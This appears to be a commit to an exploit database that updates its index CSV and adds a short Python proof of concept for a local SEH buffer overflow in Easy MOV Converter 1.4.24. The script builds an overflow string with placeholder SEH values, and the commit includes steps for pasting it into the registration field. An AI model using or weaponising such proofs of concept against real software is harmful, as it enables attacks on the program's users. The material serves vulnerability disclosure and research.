DB: 2017-04-25
1 new exploits Microsoft Windows - 'afd.sys' (PoC) (MS11-046) Microsoft Windows - 'afd.sys' Local Kernel Exploit (PoC) (MS11-046) Easy MOV Converter 1.4.24 - Local Buffer Overflow (SEH)
This commit is contained in:
parent
a4fa3243c9
commit
dadce54852
2 changed files with 45 additions and 1 deletions
|
@ -2177,7 +2177,7 @@ id,file,description,date,author,platform,type,port
|
|||
18739,platforms/windows/dos/18739.txt,"IrfanView FlashPix PlugIn - Decompression Heap Overflow",2012-04-14,"Francis Provencher",windows,dos,0
|
||||
18751,platforms/hardware/dos/18751.txt,"Samsung D6000 TV - Multiple Vulnerabilities",2012-04-19,"Luigi Auriemma",hardware,dos,0
|
||||
18754,platforms/multiple/dos/18754.php,"LibreOffice 3.5.2.2 - Memory Corruption",2012-04-19,shinnai,multiple,dos,0
|
||||
18755,platforms/windows/dos/18755.c,"Microsoft Windows - 'afd.sys' (PoC) (MS11-046)",2012-04-19,fb1h2s,windows,dos,0
|
||||
18755,platforms/windows/dos/18755.c,"Microsoft Windows - 'afd.sys' Local Kernel Exploit (PoC) (MS11-046)",2012-04-19,fb1h2s,windows,dos,0
|
||||
18756,platforms/multiple/dos/18756.txt,"OpenSSL - ASN1 BIO Memory Corruption",2012-04-19,"Tavis Ormandy",multiple,dos,0
|
||||
18757,platforms/windows/dos/18757.txt,"VideoLAN VLC Media Player 2.0.1 - '.mp4' Crash (PoC)",2012-04-19,"Senator of Pirates",windows,dos,0
|
||||
18758,platforms/multiple/dos/18758.txt,"Wireshark - 'call_dissector()' Null Pointer Dereference Denial of Service",2012-04-19,Wireshark,multiple,dos,0
|
||||
|
@ -5473,6 +5473,7 @@ id,file,description,date,author,platform,type,port
|
|||
41893,platforms/linux/dos/41893.txt,"pinfo 0.6.9 - Local Buffer Overflow",2017-04-18,"Nassim Asrir",linux,dos,0
|
||||
41905,platforms/multiple/dos/41905.txt,"VirtualBox - Environment and ioctl Unprivileged Host User to Host Kernel Privilege Escalation",2017-04-20,"Google Security Research",multiple,dos,0
|
||||
41906,platforms/multiple/dos/41906.txt,"VirtualBox - 'virtio-net' Guest-to-Host Out-of-Bounds Write",2017-04-20,"Google Security Research",multiple,dos,0
|
||||
41911,platforms/windows/dos/41911.py,"Easy MOV Converter 1.4.24 - Local Buffer Overflow (SEH)",2017-03-12,Muhann4d,windows,dos,0
|
||||
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
|
||||
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
|
||||
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
|
||||
|
|
Can't render this file because it is too large.
|
43
platforms/windows/dos/41911.py
Executable file
43
platforms/windows/dos/41911.py
Executable file
|
@ -0,0 +1,43 @@
|
|||
#!/usr/bin/python
|
||||
# Exploit Title : Easy MOV Converter - 'Enter User Name' Field SEH Overwrite POC
|
||||
# Date : 12/03/2017
|
||||
# Exploit Author : Muhann4d
|
||||
# Vendor Homepage : http://www.divxtodvd.net/
|
||||
# Software Link : http://www.divxtodvd.net/easy_mov_converter.exe
|
||||
# Tested Version : 1.4.24
|
||||
# Category : Denial of Service (DoS) Local
|
||||
# Tested on OS : Windows 7 SP1 32bit
|
||||
|
||||
# Proof of Concept : run the exploit, copy the content of poc.txt
|
||||
# go to the Register button and in the "Enter User Name" field paste the content of poc.txt and press OK.
|
||||
|
||||
# The vendor has been cantacted but no reply
|
||||
|
||||
# All the vendor's softwares below are affected to this bug which all can be found in http://www.divxtodvd.net/
|
||||
# Easy DVD Creator
|
||||
# Easy MPEG/AVI/DIVX/WMV/RM to DVD
|
||||
# Easy Avi/Divx/Xvid to DVD Burner
|
||||
# Easy MPEG to DVD Burner
|
||||
# Easy WMV/ASF/ASX to DVD Burner
|
||||
# Easy RM RMVB to DVD Burner
|
||||
# Easy CD DVD Copy
|
||||
# MP3/AVI/MPEG/WMV/RM to Audio CD Burner
|
||||
# MP3/WAV/OGG/WMA/AC3 to CD Burner
|
||||
# MP3 WAV to CD Burner
|
||||
# My Video Converter
|
||||
# Easy MOV Converter
|
||||
# Easy AVI DivX Converter
|
||||
# Easy Video to iPod Converter
|
||||
# Easy Video to PSP Converter
|
||||
# Easy Video to 3GP Converter
|
||||
# Easy Video to MP4 Converter
|
||||
# Easy Video to iPod/MP4/PSP/3GP Converter
|
||||
|
||||
buffer = "\x41" * 1008
|
||||
nSEH = "\x42\x42\x42\x42"
|
||||
SEH = "\x43\x43\x43\x43"
|
||||
f = open ("poc.txt", "w")
|
||||
f.write(buffer + nSEH + SEH)
|
||||
f.close()
|
||||
|
||||
|
Loading…
Add table
Reference in a new issue